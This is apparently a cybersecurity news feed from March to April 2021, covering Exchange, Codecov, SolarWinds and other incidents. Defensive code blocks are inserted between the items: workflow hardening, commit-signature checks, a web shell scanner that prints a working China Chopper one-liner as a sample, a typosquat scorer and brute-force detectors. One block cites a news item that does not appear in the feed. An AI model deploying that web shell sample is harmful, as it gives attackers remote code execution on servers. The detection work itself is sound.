The patch for ProxyLogon vulnerabilities was released more than a month ago. However, one more ransomware actor succeeded in joining the list of growing numbers of new adversaries exploiting it.Cyware Alerts - Hacker News
April 21, 2021
Codecov Supply Chain Attack May Hit Thousands: Report Full Text
Abstract
Investigators have reportedly already found hundreds of victim customersInfosecurity Magazine
April 20, 2021
Hundreds of networks reportedly hacked in Codecov supply-chain attack Full Text
Abstract
More details have emerged on the recent Codecov system breach which is being likened to the SolarWinds hack. In new reporting, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems.BleepingComputer
April 20, 2021
Attackers Test Weak Passwords in Purple Fox Malware Attacks Full Text
Abstract
Weak passwords used over the Windows Server Message Block (SMB) protocol are often part of attacks that result in the spread of Purple Fox malware, Specops researchers report.Dark Reading
April 15, 2021
A Casino Gets Hacked Through a Fish-Tank Thermometer Full Text
Abstract
That was the lesson learned a few years ago from the operators of a North American casino. According to a 2018 Business Insider report, cybersecurity executive Nicole Eagan of security firm Darktrace told the story while addressing a conference.Entrepreneur
April 15, 2021
University of Hertfordshire hit by cyberattack Full Text
Abstract
The University of Hertfordshire was targeted by a cyberattack that resulted in the university's entire IT network being taken down, as well as all access to cloud-based services being blocked.IT Security Guru
April 15, 2021
NBA’s Houston Rockets probing cyber attack, working closely with FBI Full Text
Abstract
The Houston Rockets are investigating a cyber attack that attempted to install ransomware on the basketball team’s internal systems, and the organization is working closely with the FBI, team officials said.Reuters
April 14, 2021
New Jersey School Districts Investigate Cyber-Attacks Full Text
Abstract
Two Somerset County school districts suspect they were targeted by cyber-criminalsInfosecurity Magazine
April 13, 2021
Attacker hacked one Microsoft Exchange server to gain access to others Full Text
Abstract
The tactic is sophisticated, with firewalls unlikely to block traffic between Exchange servers and potentially giving such traffic a pass in terms of content inspection.SCMagazine
April 12, 2021
Iran Nuclear Facility Suffers Cyber-Attack Full Text
Abstract
Israeli public media claims Israel was behind a cyber-attack on Iran’s Natanz nuclear complexInfosecurity Magazine
April 9, 2021
Washington State Educational Organizations Targeted in Cryptojacking Campaign Full Text
Abstract
According to a new advisory released by Palo Alto Networks' Unit 42 team, cryptojacking incidents have recently taken place against educational institutions in Washington State.ZDNet
April 08, 2021
Major DC insurance provider hacked by ‘foreign cybercriminals’ Full Text
Abstract
CareFirst BlueCross BlueShield’s Community Health Plan District of Columbia (CHPDC) suffered a data breach carried out by what it described as a “foreign cybercriminal” group in January that potentially impacted sensitive data, the company told customers this week.The Hill
April 8, 2021
Over 200 Bangladesh Organizations Hit by Hafnium Hacker Group Full Text
Abstract
According to a Cyber Threat Report released by the Bangladesh Government’s e-GOV CIRT on April 1st, hacker group Hafnium has launched attacks on more than 200 organizations in Bangladesh.Heimdal Security
April 7, 2021
Attackers Blowing Up Discord, Slack with Malware Full Text
Abstract
One Discord network search turned up 20,000 virus results, researchers found.Threatpost
April 06, 2021
European Commission, other EU orgs recently hit by cyber-attack Full Text
Abstract
The European Commission and several other European Union organizations were hit by a cyberattack in March according to a European Commission spokesperson.BleepingComputer
April 5, 2021
GitHub Infrastructure Used to Mine Cryptocurrency Full Text
Abstract
The threat actors seem to be targeting repositories that have GitHub Actions enabled, adding malicious Actions in forks and filing pull requests that cause the attacker's code to execute on GitHub's runners.Heimdal Security
April 3, 2021
Attackers Found Abusing GitHub Infrastructure to Mine Cryptocurrency Full Text
Abstract
GitHub launched an investigation into a series of attacks aimed at abusing its infrastructure to illicitly mine cryptocurrency. Such attacks have been reported since at least the end of 2020.Security Affairs
April 03, 2021
GitHub Actions being actively abused to mine cryptocurrency on GitHub servers Full Text
Abstract
GitHub Actions has been abused by attackers to mine cryptocurrency on GitHub's own servers, automatically. The attack adds malicious GitHub Actions code to a fork of a legitimate repository and then opens a pull request against the original; the upstream workflow runs the attacker's code as soon as the pull request is filed, whether or not the maintainers ever merge it.BleepingComputer
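The abuse described above works because a fork's edited workflow file runs on upstream runners with nothing to stop it. The workflow below is an added hardening example, not configuration from GitHub, BleepingComputer or any affected project; the job name, the build command and the `<full-commit-sha>` placeholder are assumptions.

```yaml
# Added example (not from any project named in the article above).
name: ci
on:
  pull_request:          # fork PRs get a read-only GITHUB_TOKEN and no repository secrets
  # pull_request_target: # this event grants a write token and secrets to code from a fork;
                         # never combine it with a checkout of the PR head
permissions:
  contents: read         # least privilege for the token; grant more per job only when needed
jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 15  # caps how long a hijacked job can mine before GitHub kills it
    steps:
      - uses: actions/checkout@<full-commit-sha>   # pin by commit SHA, not a mutable tag (assumed placeholder)
      - run: make test                             # assumed build command
```

The workflow file alone cannot stop a fork from editing it; the control for that is the repository setting under Settings, Actions, General, "Fork pull request workflows from outside collaborators", set to require approval for all outside collaborators, so that nothing from an unknown fork runs until a maintainer has looked at the pull request. The `timeout-minutes` line limits the damage if something does slip through.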
April 3, 2021
Attackers are abusing GitHub infrastructure to mine cryptocurrency Full Text
Abstract
The popular code repository hosting service GitHub is investigating a crypto-mining campaign that abuses its infrastructure, a series of attacks in which threat actors run miners on GitHub's own systems.Security Affairs
April 1, 2021
Website of global parliamentary alliance on China suffers cyber attack Full Text
Abstract
The IPAC's website was down on Monday, after suffering a DDoS attack (distributed denial-of-service), causing the site to slow significantly, The Sydney Morning Herald reported.The Times Of India
March 30, 2021
30 Docker images downloaded 20M times in cryptojacking attacks Full Text
Abstract
Palo Alto Networks researcher Aviv Sasson discovered 30 malicious Docker images that, with a combined total of 20 million pulls, were involved in cryptomining operations.Security Affairs
March 29, 2021
PHP’s Git server hacked to add backdoors to PHP source code Full Text
Abstract
In the latest software supply chain attack, the official PHP Git repository was hacked and tampered with. Yesterday, two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server. The threat actors had signed off on these commits as if they were made by known PHP developers.BleepingComputer
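The php-src commits above looked authentic because their author fields and Signed-off-by trailers named real maintainers; both are plain text that anyone with push access can write. What a reviewer or a pre-receive hook can actually verify is a cryptographic signature checked against a key the project trusts. The following is an added example, not tooling from the PHP project: `SAMPLE_LOG` is constructed output of `git log --format='%H%x09%G?%x09%GF%x09%ae%x09%s'`, and `ALLOWED_KEYS` (key fingerprint to maintainer e-mail) is an assumed allowlist with made-up fingerprints.

```python
"""Commit-signature policy check for a branch (added example, not PHP's own tooling)."""

# %G? status codes git prints; see the "pretty formats" section of git-log(1).
STATUS = {
    "G": "good signature", "B": "bad signature", "U": "good signature, untrusted key",
    "X": "good signature, expired", "Y": "good signature, expired key",
    "R": "good signature, revoked key", "E": "signature cannot be checked", "N": "unsigned",
}

ALLOWED_KEYS = {  # constructed fingerprints and addresses, not real keys
    "0123456789ABCDEF0123456789ABCDEF01234567": "nikita@php.net",
    "89ABCDEF0123456789ABCDEF0123456789ABCDEF": "rasmus@php.net",
}

# Constructed `git log` output: hash, %G? status, signing-key fingerprint, author e-mail, subject.
SAMPLE_LOG = "\n".join([
    "a" * 40 + "\tG\t0123456789ABCDEF0123456789ABCDEF01234567\tnikita@php.net\tFix typo",
    "b" * 40 + "\tN\t\trasmus@php.net\t[skip-ci] Fix typo",   # unsigned; author field is spoofable
    "c" * 40 + "\tU\tFEDCBA9876543210FEDCBA9876543210FEDCBA98\tsomeone@example.org\tAdd feature",
    "d" * 40 + "\tB\t0123456789ABCDEF0123456789ABCDEF01234567\tnikita@php.net\tTweak",
    "e" * 40 + "\tG\t89ABCDEF0123456789ABCDEF0123456789ABCDEF\tnikita@php.net\tRefactor",
    "f" * 40 + "\tG\tFEDCBA9876543210FEDCBA9876543210FEDCBA98\tsomeone@example.org\tCleanup",
])


def audit(log_text, allowed=ALLOWED_KEYS):
    """Map commit hash -> 'ok' or 'reject: <reason>'.

    Policy: %G? must be G (good, trusted signature) and the signing key must belong
    to the commit's author, so a commit "authored" as a maintainer must carry that
    maintainer's signature. Signed-off-by trailers are ignored on purpose.
    """
    verdicts = {}
    for line in log_text.splitlines():
        commit, status, fpr, author, _subject = line.split("\t", 4)
        if status == "N":
            verdicts[commit] = "reject: unsigned (Signed-off-by trailers do not count)"
        elif status != "G":
            verdicts[commit] = f"reject: {STATUS.get(status, 'unknown status ' + status)}"
        elif fpr not in allowed:
            verdicts[commit] = f"reject: key {fpr[-8:]} not in allowlist"
        elif allowed[fpr] != author:
            verdicts[commit] = f"reject: signer/author mismatch ({allowed[fpr]} signed as {author})"
        else:
            verdicts[commit] = "ok"
    return verdicts


if __name__ == "__main__":
    # On a real server: git log --format='%H%x09%G?%x09%GF%x09%ae%x09%s' origin/master..HEAD
    for commit, verdict in audit(SAMPLE_LOG).items():
        print(commit[:12], verdict)
```

Run inside a pre-receive hook over the pushed range and refuse the push on any verdict other than `ok`; the signer/author check is what catches the case in the article, a commit whose author line claims a known developer but whose signature, if any, comes from someone else.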
March 27, 2021
Instagram Business Accounts Under Attack by CopperStealer Full Text
Abstract
This malware is now targeting Instagram and Facebook business accounts to steal passwords stored in Edge, Chrome, Opera, Firefox, and Yandex.Cyware Alerts - Hacker News
March 26, 2021
German Parliament Bundestag targeted again by Russia-linked hackers Full Text
Abstract
Several members of the German federal parliament (Bundestag) and of state parliaments were hit by a targeted attack allegedly launched by Russia-linked hackers. German newspaper Der Spiegel revealed that the email accounts of multiple members...Security Affairs
March 26, 2021
German Parliament targeted again by Russian state hackers Full Text
Abstract
Email accounts of multiple German Parliament members were targeted in a spearphishing attack. It is not yet known if any data was stolen during the incident.BleepingComputer
March 25, 2021
Microsoft Exchange Attacks - Wild Tornado on Loose Full Text
Abstract
Weeks after the disclosure of the ProxyLogon group of security bugs, exploitation attempts against unpatched Microsoft Exchange servers have skyrocketed.Cyware Alerts - Hacker News
March 25, 2021
CNA Suffers “Sophisticated” Cyber-Attack Full Text
Abstract
Insurance giant’s website reduced to attack notice following Sunday cyber-strikeInfosecurity Magazine
March 24, 2021
SolarWinds Attackers Manipulated OAuth App Certificates Full Text
Abstract
The SolarWinds supply chain attackers manipulated OAuth app certificates to maintain persistence and access privileged resources including email, according to researchers at Proofpoint.Gov Info Security
March 24, 2021
Inside the Web Shell Used in the Microsoft Exchange Server Attacks Full Text
Abstract
China Chopper Web shells are an older threat causing new problems for many organizations targeted in ongoing attacks against vulnerable Microsoft Exchange Servers worldwide.Dark Reading
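The China Chopper shell referred to above is a one-line ASP.NET page that hands whatever arrives in a request parameter straight to `eval()` with the `"unsafe"` flag, which makes it easy to find on disk. The scanner below is an added example, not Microsoft's or Dark Reading's tooling: `SHELL_SAMPLE` and `BENIGN_SAMPLE` are constructed, and the default Exchange paths in `main` are the drop locations Microsoft reported during this campaign, not an exhaustive list.

```python
"""Scanner for China Chopper style web shells on an Exchange server (added example)."""
import os
import re
import sys

SIGNATURES = {
    # <%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>
    "china_chopper_eval": re.compile(r'eval\s*\(\s*Request\.Item\s*\[', re.I),
    "unsafe_eval_flag":   re.compile(r'Request\s*[\.\[][^\n]*,\s*"unsafe"\s*\)', re.I),
    "process_spawn":      re.compile(r'System\.Diagnostics\.Process', re.I),      # lower confidence
    "request_to_script":  re.compile(r'(Execute|ExecuteGlobal)\s*\(\s*Request', re.I),  # classic ASP variant
}
WEB_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".cshtml")

# Constructed samples, not files recovered from any incident.
SHELL_SAMPLE = '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>'
BENIGN_SAMPLE = '<%@ Page Language="C#" %>\n<html><body><% Response.Write("Hello"); %></body></html>'

# Paths Microsoft reported as drop locations in this campaign (assumed defaults).
DEFAULT_ROOTS = [
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
]


def scan_text(text):
    """Return [(signature_name, line_number)] for every signature hit in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.append((name, lineno))
    return hits


def scan_tree(root):
    """Walk root for server-side script files and report hits per file path."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    hits = scan_text(fh.read())
            except OSError:
                continue   # unreadable file: note it separately in a real sweep
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    for root in sys.argv[1:] or DEFAULT_ROOTS:
        for path, hits in scan_tree(root).items():
            print(path, hits)
```

Scan the whole web root, not only the default paths, and treat a hit as a trigger for forensic collection (file timestamps, IIS logs for POSTs to that path) rather than a reason to delete the file and move on.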
March 23, 2021
Podcast: Microsoft Exchange Server Attack Onslaught Continues Full Text
Abstract
Derek Manky, Chief of Security Insights & Global Threat Alliances at Fortinet’s FortiGuard Labs, gives insight into the surge in attacks against vulnerable Microsoft Exchange servers over the last week.Threatpost
March 23, 2021
Shell Latest to Fall to Accellion FTA Exploits Full Text
Abstract
Oil giant admits personal and corporate data was stolenInfosecurity Magazine
March 22, 2021
Ministry of Defence academy hit by state-sponsored hackers Full Text
Abstract
The UK Ministry of Defence academy was hit by a major cyber attack, with Russian and Chinese state-sponsored hackers suspected of being behind the offensive, according to a British tabloid newspaper...Security Affairs
March 19, 2021
Beware the Package Typosquatting Supply Chain Attack Full Text
Abstract
Attackers are mimicking the names of existing packages on public registries in hopes that users or developers will accidentally download these malicious packages instead of legitimate ones.Dark Reading
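Package typosquatting and the typo-squatted sender domains of the BEC campaign reported above (Microsoft, May 7) are the same trick: a name one keystroke or one confusable glyph away from a trusted one. The scorer below is an added example, not code from Microsoft, Dark Reading or any registry; `PROTECTED`, `CONFUSABLES` and the distance limits are assumptions. Registration age, the other signal in the BEC report, needs an RDAP or WHOIS lookup and is not attempted here.

```python
"""Lookalike-name scorer for domains and package names (added example)."""
import unicodedata

# Substitutions attackers commonly use; an assumption, deliberately short.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "rn": "m", "vv": "w"}

# Constructed list of names to protect: one domain, one package.
PROTECTED = ["example.com", "requests"]


def normalize(name: str) -> str:
    """Lower-case, strip accents and non-ASCII homoglyphs, fold confusable sequences."""
    folded = unicodedata.normalize("NFKD", name).encode("ascii", "ignore").decode().lower()
    for bad, good in CONFUSABLES.items():
        folded = folded.replace(bad, good)
    return folded


def damerau_levenshtein(a: str, b: str) -> int:
    """Edit distance counting insert, delete, substitute and adjacent transposition."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[len(a)][len(b)]


def label(name: str) -> str:
    """Compare only the registrable label of a domain; package names stay whole."""
    return name.split(".")[0] if "." in name else name


def classify(candidate: str, protected=PROTECTED):
    """Return {'target', 'reason', 'distance'} for a lookalike, or None.

    An exact (case-insensitive) match is the genuine name and is never flagged.
    """
    cand = label(candidate)
    if any(cand.lower() == label(p).lower() for p in protected):
        return None
    cand_norm = normalize(cand)
    best = None
    for p in protected:
        target_norm = normalize(label(p))
        if cand_norm == target_norm:
            return {"target": p, "reason": "confusable-match", "distance": 0}
        limit = 1 if len(target_norm) < 6 else 2   # short names need a tighter limit
        dist = damerau_levenshtein(cand_norm, target_norm)
        if dist <= limit and (best is None or dist < best["distance"]):
            best = {"target": p, "reason": "edit-distance", "distance": dist}
    return best


if __name__ == "__main__":
    for name in ["exarnple.com", "exmaple.com", "examp1e.com", "requets", "example.com", "unrelated.org"]:
        print(f"{name:15} -> {classify(name)}")
```

Feed it the sender domains from mail logs on one side and the dependency names from a lockfile on the other; the confusable fold catches `rn` for `m` and digit-for-letter swaps that a plain edit distance scores as real differences, while the transposition rule catches the fat-finger cases.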
March 19, 2021
RDP Attacks Reached Record Levels as More Employees Continue to Work from Home Full Text
Abstract
The vast majority of companies had to switch to remote work due to the Covid-19 pandemic. As life for large swaths of...Cyber Security News
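Both the RDP wave above and the Purple Fox SMB guessing reported on April 20 leave the same trail on a Windows host: bursts of Security event 4625 (failed logon), logon type 10 for RDP and type 3 for SMB. The detector below is an added example, not tooling from Specops, Dark Reading or Cyber Security News; `SAMPLE_EVENTS` is a constructed, flattened export of such events, and the thresholds and window are assumptions to tune per environment.

```python
"""Failed-logon burst detector for SMB and RDP password guessing (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: "timestamp,source_ip,target_account,logon_type". Not real logs.
# Logon type 3 = network (SMB share access), 10 = RemoteInteractive (RDP).
SAMPLE_EVENTS = """\
2021-04-19T02:00:01,203.0.113.7,Administrator,3
2021-04-19T02:00:03,203.0.113.7,Administrator,3
2021-04-19T02:00:05,203.0.113.7,Administrator,3
2021-04-19T02:00:07,203.0.113.7,Administrator,3
2021-04-19T02:00:09,203.0.113.7,Administrator,3
2021-04-19T02:00:11,203.0.113.7,Administrator,3
2021-04-19T03:10:00,198.51.100.9,alice,10
2021-04-19T03:10:30,198.51.100.9,bob,10
2021-04-19T03:11:00,198.51.100.9,carol,10
2021-04-19T03:11:30,198.51.100.9,dave,10
2021-04-19T03:12:00,198.51.100.9,erin,10
2021-04-19T03:12:30,198.51.100.9,frank,10
2021-04-19T03:13:00,198.51.100.9,grace,10
2021-04-19T03:13:30,198.51.100.9,heidi,10
2021-04-19T08:15:00,192.0.2.5,jdoe,10
2021-04-19T09:30:00,192.0.2.5,jdoe,10
"""

WINDOW = timedelta(minutes=10)   # assumed
BRUTE_FORCE_THRESHOLD = 5        # failures against one account from one source (assumed)
SPRAY_THRESHOLD = 5              # distinct accounts tried from one source (assumed)
LOGON_TYPE_NAMES = {3: "network (SMB)", 10: "RemoteInteractive (RDP)"}


def parse_events(text):
    """Parse the flattened export into sorted (time, source, account, logon_type) tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, src, account, ltype = line.split(",")
        events.append((datetime.fromisoformat(ts), src, account.lower(), int(ltype)))
    return sorted(events)


def peak_in_window(events, measure):
    """Largest measure(slice) over any WINDOW-long slice of time-sorted events."""
    start, best, best_slice = 0, 0, []
    for end in range(len(events)):
        while events[end][0] - events[start][0] > WINDOW:
            start += 1
        value = measure(events[start:end + 1])
        if value > best:
            best, best_slice = value, events[start:end + 1]
    return best, best_slice


def type_names(window):
    return sorted({LOGON_TYPE_NAMES.get(e[3], str(e[3])) for e in window})


def detect(text):
    """Return brute-force (one account hammered) and spray (many accounts) alerts."""
    events = parse_events(text)
    by_pair, by_src = defaultdict(list), defaultdict(list)
    for ev in events:
        by_pair[(ev[1], ev[2])].append(ev)
        by_src[ev[1]].append(ev)
    alerts = []
    for (src, account), evs in by_pair.items():
        count, window = peak_in_window(evs, len)
        if count >= BRUTE_FORCE_THRESHOLD:
            alerts.append({"type": "brute_force", "source": src, "account": account,
                           "failures": count, "logon_types": type_names(window)})
    for src, evs in by_src.items():
        distinct, window = peak_in_window(evs, lambda w: len({e[2] for e in w}))
        if distinct >= SPRAY_THRESHOLD:
            alerts.append({"type": "password_spray", "source": src,
                           "accounts": distinct, "logon_types": type_names(window)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The two rules are deliberately separate: a spray keeps per-account failures below lockout thresholds and is invisible to a per-account counter, while a brute force against one account never trips a distinct-account count. Exporting the real events with `wevtutil qe Security /q:"*[System[EventID=4625]]"` and flattening the IpAddress, TargetUserName and LogonType fields gives the same shape as `SAMPLE_EVENTS`.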
March 18, 2021
Understanding and Responding to the SolarWinds Supply Chain Attack: The Federal Perspective Full Text
Abstract
On Thursday, March 18, 2021, at 10:15 a.m., the Senate Homeland Security and Governmental Affairs Committee will hold a hearing on understanding and responding to the SolarWinds supply chain attack.Lawfare
March 17, 2021
Chile’s bank regulator shares IOCs after Microsoft Exchange hack Full Text
Abstract
Chile's Comisión para el Mercado Financiero (CMF) has disclosed that their Microsoft Exchange server was compromised through the recently disclosed ProxyLogon vulnerabilities.BleepingComputer
March 17, 2021
China suspected of cyber attack on Western Australia’s Parliament during state election Full Text
Abstract
Western Australia's parliamentary email network was hit by suspected Chinese hackers earlier this month as part of a massive global cyber-attack involving Microsoft software.ABC
March 17, 2021
Nurseries sent first official cyber-attack warning Full Text
Abstract
Sarah Lyons, deputy director for economy and society engagement at the NCSC, said across educational settings it was "vital that all providers know how to secure their devices and sensitive data".BBC
March 16, 2021
UK Nurseries Get First Official Cyber-Attack Warning Full Text
Abstract
NCSC warns childminders and nurseries to safeguard personal data and be wary of malwareInfosecurity Magazine
March 16, 2021
Cream Finance and PancakeSwap Cryptocurrency Portals Experience DNS Hijacking Attacks Simultaneously Full Text
Abstract
According to a source who tipped The Record earlier today, the same attacker is believed to be behind both incidents as DNS records for both websites were changed within a minute of each other.The Record
March 15, 2021
Blender website in maintenance mode after hacking attempt Full Text
Abstract
Blender.org, the official website of the popular 3D computer graphics software Blender, is now in maintenance mode according to a message displayed on the site.BleepingComputer
March 15, 2021
New Browser cache-based side-channel Attack that Works Even When Script Execution is Completely Blocked Full Text
Abstract
Recently, a group of security researchers from the University of Michigan, Ben-Gurion University of the Negev, and the University of Adelaide have...Cyber Security News
March 13, 2021
Molson Coors Production Stopped Following a Cyberattack Full Text
Abstract
A cyber attack took place at Molson Coors breweries based in Milwaukee. It looks like the hack was crippling, leaving the brewery unable to produce beer at the time of the attack.Heimdal Security
March 12, 2021
Researchers warn of a surge in cyber attacks against Microsoft Exchange Full Text
Abstract
Researchers at Check Point Research warn of a surge in cyber attacks against Microsoft Exchange servers, with threat actors actively exploiting the recently disclosed ProxyLogon vulnerabilities...Security Affairs
March 12, 2021
University of Central Lancashire among three hit by cyber-attacks Full Text
Abstract
The University of the Highlands and Islands in Scotland and Queen's University in Belfast were also targeted. The National Cyber Security Centre has launched an investigation.BBC
March 11, 2021
New Browser Attack Allows Tracking Users Online With JavaScript Disabled Full Text
Abstract
Researchers have discovered a new side-channel that they say can be reliably exploited to leak information from web browsers that could then be leveraged to track users even when JavaScript is completely disabled. "This is a side-channel attack which doesn't require any JavaScript to run," the researchers said. "This means script blockers cannot stop it. The attacks work even if you strip out all of the fun parts of the web browsing experience. This makes it very difficult to prevent without modifying deep parts of the operating system." In avoiding JavaScript, the side-channel attacks are also architecturally agnostic, resulting in microarchitectural website fingerprinting attacks that work across hardware platforms, including Intel Core, AMD Ryzen, Samsung Exynos 2100, and Apple M1 CPUs — making it the first known side-channel attack on the iPhone maker's new ARM-based chipsets. The findings , which come from a group of academics from the Ben-Gurion UThe Hacker News
March 11, 2021
Molson Coors brewing operations disrupted by cyberattack Full Text
Abstract
The Molson Coors Beverage Company has suffered a cyberattack that is causing significant disruption to business operations.BleepingComputer
March 11, 2021
There is Still More to SolarWinds Attack Full Text
Abstract
Microsoft and FireEye uncover three more malware strains, used between August and September 2020, that are associated with the suspected Russian perpetrators of the SolarWinds breach.Cyware Alerts - Hacker News
March 11, 2021
Norwegian Parliament Hit by Second Cyberattack in Span of Six Months Full Text
Abstract
Hackers have infiltrated the Norwegian Parliament’s computer systems and extracted data, officials said on Wednesday, just six months after a previous cyber attack was made public.Reuters
March 10, 2021
Superstar K-Pop Band’s TikTok Hacked Full Text
Abstract
Hacker compromises BTS’s TikTok account and uploads creepy music videoInfosecurity Magazine
March 10, 2021
Norway parliament data stolen in Microsoft Exchange attack Full Text
Abstract
Norway's parliament, the Storting, has suffered another cyberattack after threat actors stole data using the recently disclosed Microsoft Exchange vulnerabilities.BleepingComputer
March 10, 2021
Hackers Break Into Verkada Surveillance Cameras at Tesla, Hundreds of Businesses Full Text
Abstract
The hackers sought to draw attention to the pervasive monitoring of people after having found login information for Verkada’s administrative tools publicly online this week, a researcher said.Reuters
March 10, 2021
NHS Regulator Faces Surge in Email Attacks During Vaccine Rollout Full Text
Abstract
The CQC was targeted by nearly 60,000 malicious email attacks from December 2020 to February 2021Infosecurity Magazine
March 9, 2021
EU Banking Regulator Hit by Microsoft Email Hack Full Text
Abstract
The EBA had said in a statement on Sunday that it had taken its email systems offline as a precaution, noting that access to personal data held on servers "may have been obtained by the attacker".Security Week
March 9, 2021
Supply Chain Attack Trends Involving Apps and Extensions Full Text
Abstract
The recent barcode scanner supply chain attack, in which the attackers bought an established app together with its source code and then pushed a malicious version to its existing install base, is a new technique that will likely grow in popularity among cybercriminals.Cyware Alerts - Hacker News
March 9, 2021
University of the Highlands and Islands shuts down campuses as it deals with ‘ongoing cyber incident’ Full Text
Abstract
The institution, which spans 13 locations across the northernmost part of the UK, warned that "most services" – including its Brightspace virtual learning environment – were affected.The Register
March 9, 2021
The launch of Williams new FW43B car ruined by hackers Full Text
Abstract
The Williams team presented its new Formula One car on Friday, but hackers partially ruined the launch by hacking an “augmented reality” app that was designed to show the new vehicle.Security Affairs
March 8, 2021
How auto-scanning and scripting helped Exchange attackers rack up victims Full Text
Abstract
The lesson here: malicious actors continue to combine automated scanners and scripts to rack up high victim counts quickly, especially when they sense that the window before victims patch is closing.SCMagazine
March 8, 2021
As Hafnium timeline crystallizes, signs of new Microsoft Exchange Server attacks emerge Full Text
Abstract
A surge of breaches against Microsoft Exchange Server appear to have rolled out in phases, with signs also pointing to other hackers using the same vulnerabilities after Microsoft announced a patch.SCMagazine
March 08, 2021
European Banking Authority discloses Exchange server hack Full Text
Abstract
The European Banking Authority (EBA) took down all email systems after their Microsoft Exchange Servers were hacked as part of the ongoing attacks targeting organizations worldwide.BleepingComputer
March 8, 2021
Multiple Airlines Affected Following SITA Cyberattack Full Text
Abstract
After SITA issued a statement confirming it had been the subject of a cyberattack, more airlines confirmed they have been directly affected. It appears the SITA breach affected all carrier members of Star Alliance and the One World alliance.Heimdal Security
March 08, 2021
Unpatched QNAP devices are being hacked to mine cryptocurrency Full Text
Abstract
Unpatched network-attached storage (NAS) devices are targeted in ongoing attacks where the attackers try to take them over and install cryptominer malware to mine for cryptocurrency.BleepingComputer
March 08, 2021
Microsoft Exchange Cyber Attack — What Do We Know So Far? Full Text
Abstract
Microsoft on Friday warned of active attacks exploiting unpatched Exchange Servers carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe. The company said "it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM," signaling an escalation that the breaches are no longer "limited and targeted" as was previously deemed. According to independent cybersecurity journalist Brian Krebs , at least 30,000 entities across the U.S. — mainly small businesses, towns, cities, and local governments — have been compromised by an "unusually aggressive" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server. Victims are also being reported from outside the U.S., with email syThe Hacker News
March 8, 2021
Czech officials in Prague ‘hit by massive cyber attack’ Full Text
Abstract
Czech officials in Prague have been hit by a large-scale cyberattack, according to the city's mayor. The email system was taken offline immediately as a precaution.Euronews
March 8, 2021
Microsoft Attack Blamed On China Morphs Into Global Crisis Full Text
Abstract
A sophisticated attack on Microsoft Corp.’s widely used business email software is morphing into a global cybersecurity crisis, as hackers race to infect as many victims as possible before companies can secure their computer systems.Yahoo! Finance
March 5, 2021
Czech capital Prague, Labour Ministry face cyber attacks Full Text
Abstract
The Czech capital Prague and the Labour Ministry said there had been cyber attacks on their email systems but although the mayor of Prague said it was a large attack, he added the damage caused was limited.Reuters
March 5, 2021
Colorado-Based SendGrid Email Marketing Company Accounts Were Hacked Full Text
Abstract
It appears the attackers used Zoom invites as a lure, together with an extensive list of email addresses; in this way "Contact" was able to deliver messages from hacked accounts on the SendGrid cloud-based platform.Heimdal Security
March 5, 2021
D-Link, IoT Devices Under Attack By Tor-Based Gafgyt Variant Full Text
Abstract
A new variant of the Gafgyt botnet – that’s actively targeting vulnerable D-Link and Internet of Things devices – is the first variant of the malware to rely on Tor communications, researchers say.Threatpost
March 5, 2021
Docker Hub and Bitbucket Resources Hijacked for Crypto-Mining Full Text
Abstract
Developer environments seen as an easy target for attack. Source: Infosecurity Magazine
March 05, 2021
Mazafaka — Elite Hacking and Cybercrime Forum — Got Hacked! Full Text
Abstract
In what's a case of hackers getting hacked, a prominent underground online criminal forum by the name of Maza has been compromised by unknown attackers, making it the fourth forum to have been breached since the start of the year. The intrusion is said to have occurred on March 3, with information about the forum members — including usernames, email addresses, and hashed passwords — publicly disclosed on a breach notification page put up by the attackers, stating "Your data has been leaked" and "This forum has been hacked." "The announcement was accompanied by a PDF file allegedly containing a portion of forum user data. The file comprised more than 3,000 rows, containing usernames, partially obfuscated password hashes, email addresses and other contact details," cybersecurity firm Intel 471 said. Originally called Mazafaka, Maza is an elite, invite-only Russian-language cybercrime forum known to be operational as early as 2003, acting as an exc... Source: The Hacker News
March 5, 2021
Fraudsters Circumvent 3D Secure with Social Engineering Full Text
Abstract
Widespread chatter on dark web highlights gaps in payment protection. Source: Infosecurity Magazine
March 04, 2021
Notorious Maza cybercrime forum attacked by other hackers Full Text
Abstract
The Maza cybercrime forum was hacked and member data leaked in the latest of a series of attacks targeting mostly Russian-speaking hacker forums. Source: BleepingComputer
March 04, 2021
Maza forum hacked in recent attacks targeting cybercrime forums Full Text
Abstract
The Maza cybercrime forum was hacked and member data leaked in the latest of a series of attacks targeting mostly Russian-speaking hacker forums. Source: BleepingComputer
March 03, 2021
Cybersecurity firm Qualys is the latest victim of Accellion hacks Full Text
Abstract
